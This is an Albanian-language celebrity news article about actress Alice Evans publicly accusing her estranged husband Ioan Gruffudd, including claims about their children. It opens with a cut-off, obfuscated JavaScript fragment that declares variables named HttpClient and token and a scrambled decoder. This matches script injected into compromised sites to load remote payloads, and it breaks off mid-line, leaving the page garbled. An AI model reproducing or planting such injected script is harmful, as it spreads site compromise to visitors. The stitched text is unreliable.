;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Aktorja e njohur akuzon bashkëshortin për ndarjen e tyre

By

Alice Evans pretendoi se ish burri i saj Ioan Gruffudd, i tha asaj se do ta linte atë nëse ajo shtonte peshë

Aktorja filloi një sulm në Twitter kundër aktorit uellsian, pasi zbuloi se vajza e saj e vogël është ‘e pangushëllueshme’ për romancën e re të babait të saj.

Ioan zbuloi romancën e tij me Bianca Wallace, duke ndarë një fotografi me të.

Kjo vjen pasi Ioan bëri kërkesë për divorc nga Alice në mars, duke përmendur dallimet mes dyshes si arsyen e ndarjes së tyre.

Në vargun e saj të fundit të postimeve në Twitter, Alice pretendoi në mënyrë tronditëse se Ioan i tha asaj më shumë se një herë se do ta linte nëse ajo ‘shtonte peshë’.

Ajo shtoi: “Ai më tha disa herë gjatë viteve se nuk i duronte dot ‘dhjamrat’ dhe do të largohej nëse shtoja peshë”.

“Unë mendoj se ai e mbajti fjalën e tij këtë herë!”

Ajo pretendoi se vajza e saj e vogël është ‘e pangushëllueshme’ për romancën e re të babait të saj, Joan pasi ai i premtoi javën e kaluar se nuk kishte të dashur.

Aktorja zbuloi se i është dashur të qëndrojë jashtë shkollës, duke pretenduar: “E gjithë bota e saj e vogël është shembur”.

Alice tha se Ioan ende nuk do t’u tregojë fëmijëve të tyre Elsie dhe Ella, për divorcin e tyre dhe ata kanë përshtypjen se ai mund të kthehet në shtëpi.

Ajo shkroi në Twitter: “Ai nuk u ka thënë ende për divorcin. Ata mendojnë se ai mund të kthehet. Të gjitha rrobat e tij janë ende aty ku i la një vit më parë. Furçë dhëmbësh, kremra, gjithçka.

Kur u pyet nëse ai ka ‘kontakte të rregullta’ me vajzat e tij tani ai nuk jeton më në shtëpinë e familjes, ajo tha: “Jo. Ai telefonon Elsie për 2 minuta dy herë në javë dhe flet se sa i bukur është hoteli i tij”.

Ajo nisi sulmin e saj të furishëm ndaj çiftit disa momente pasi Ioan, 48, dhe Bianca, 29 vjeç, ndanë një imazh së bashku teksa akuzoi aktorin Liar për përfshirje në romancë për tre vjet, ndërsa gjithashtu duke pretenduar se ajo ishte ‘shoqe’ me Biankën përpara lidhjes.

Alice dhe Ioan  u takuan në xhirimet e ‘102 Dalmatians’ në vitin 2000, kur Alice ishte në një lidhje me nipin e Pablo Picasso, Olivier.

Ajo dhe Ioan u fejuan gjashtë vjet më vonë dhe ata u martuan në një ceremoni intime në Meksikë në shtator të vitit 2007.

Artikuj të ngjashëm